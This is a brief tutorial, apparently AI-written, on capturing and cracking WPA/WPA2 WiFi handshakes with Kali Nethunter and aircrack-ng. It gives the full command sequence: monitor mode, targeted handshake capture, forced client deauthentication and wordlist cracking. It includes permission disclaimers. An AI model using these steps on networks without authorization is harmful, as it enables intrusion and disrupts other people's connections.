How to Use Nethunter and a WiFi Adapter to Get WiFi Passwords
Important Note
Before proceeding, ensure that you have permission to test the network. Unauthorized access to networks is illegal and unethical.
Requirements
- Kali Nethunter: Installed on your Android device.
- Compatible WiFi Adapter: A USB WiFi adapter that supports monitor mode and packet injection (e.g., Alfa AWUS036NHA).
- Rooted Android Device: Nethunter requires root access.
Steps to Retrieve WiFi Passwords
1. Set Up Your Environment
- Connect the WiFi Adapter: Plug in your compatible WiFi adapter to your Android device.
- Open Nethunter: Launch the Nethunter app on your device.
2. Enable Monitor Mode
- Open a terminal in Nethunter.
- Use the following command to list available wireless interfaces:
bash
Copyiwconfig
- Identify your WiFi adapter (e.g.,
wlan0
). - Enable monitor mode:
bash
Copyairmon-ng start wlan0
3. Capture Handshake
- Use
airodump-ng
to capture the WPA/WPA2 handshake:bash
Copyairodump-ng wlan0mon
- Identify the target network and note its BSSID and channel.
- Capture the handshake by specifying the target:
bash
Copyairodump-ng --bssid [BSSID] -c [CHANNEL] -w [FILE_NAME] wlan0mon
4. Deauthenticate a Client (Optional)
- If you need to force a client to reconnect and capture the handshake:
bash
Copyaireplay-ng --deauth 10 -a [BSSID] wlan0mon
- Replace
[BSSID]
with the target network’s BSSID.
5. Crack the Password
- Use a cracking tool like
aircrack-ng
to crack the captured handshake:bash
Copyaircrack-ng [FILE_NAME].cap -w [WORDLIST_PATH]
- Replace
[WORDLIST_PATH]
with the path to your wordlist file.
6. Review Results
- If successful, the WiFi password will be displayed in the terminal.
Suggested Tools
- Aircrack-ng Suite: A collection of tools for assessing WiFi network security.
- Wordlists: Use common wordlists like
rockyou.txt
for password cracking.
Images and Videos
- Images: Screenshots of the Nethunter interface, terminal commands, and results.
- Videos: Short clips demonstrating the setup process and capturing handshakes.
Conclusion
Using Nethunter with a compatible WiFi adapter can help in assessing the security of WiFi networks. Always remember to obtain permission before testing any network, and use these skills responsibly.
If you have any further questions or need clarification on specific steps, feel free to ask!